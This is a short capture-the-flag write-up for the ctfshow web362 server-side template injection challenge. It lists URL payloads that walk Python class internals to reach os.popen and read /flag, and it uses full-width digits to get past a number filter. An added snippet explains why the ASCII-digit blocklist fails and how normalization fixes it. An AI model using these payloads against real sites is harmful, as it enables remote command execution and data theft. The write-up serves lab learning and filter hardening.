ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={{"".__class__.__bases__[0].__subclasses__()}}
It's normal up to this point.
From 12 on, it didn't work at first.
There's a problem with the numbers; see the writeup (wp): use full-width digits instead of normal digits to bypass.
?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way.
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
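Seen from the filter's side, the following is an added example (not part of the original post) of why a blocklist of ASCII digits misses full-width digits, next to a check that covers every Unicode decimal digit. The challenge's real filter is not shown on this page, so `naive_filter_allows`, `hardened_filter_allows` and `fullwidth` are hypothetical names and the ASCII-only blocklist is an assumption.

```python
import re
import unicodedata

# Assumed shape of the challenge's filter (the real one is not on the page):
# reject any input that contains an ASCII digit.
ASCII_DIGIT = re.compile(r"[0-9]")


def naive_filter_allows(value: str) -> bool:
    """Return True when the ASCII-only digit blocklist lets the input through."""
    return ASCII_DIGIT.search(value) is None


def hardened_filter_allows(value: str) -> bool:
    """Reject every Unicode decimal digit (category Nd).

    NFKC folding first maps compatibility forms (full-width, superscript,
    circled digits) onto plain digits so they are caught as well.
    """
    folded = unicodedata.normalize("NFKC", value)
    return not any(unicodedata.category(ch) == "Nd" for ch in folded)


def fullwidth(n: int) -> str:
    """Spell a non-negative integer with full-width digits (U+FF10..U+FF19)."""
    return "".join(chr(0xFF10 + int(d)) for d in str(n))


# Constructed sample inputs, using the index 132 from the post.
ASCII_INDEX = "[132]"
FULLWIDTH_INDEX = "[" + fullwidth(132) + "]"


def demo() -> dict:
    return {
        "ascii index passes naive filter": naive_filter_allows(ASCII_INDEX),
        "full-width index passes naive filter": naive_filter_allows(FULLWIDTH_INDEX),
        # Python's int() accepts any Unicode decimal digit, so the value survives.
        "full-width digits parsed by int()": int(fullwidth(132)),
        "ascii index passes hardened filter": hardened_filter_allows(ASCII_INDEX),
        "full-width index passes hardened filter": hardened_filter_allows(FULLWIDTH_INDEX),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

A character filter only narrows the input; the underlying issue in an SSTI challenge is that user input is rendered as template source.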
Copyright notice
This article was written by [m0_ sixty-two million ninety-four thousand eight hundred and fo]. Please include the original link when reprinting, thanks.
https://yzsam.com/2022/04/202204231829007951.html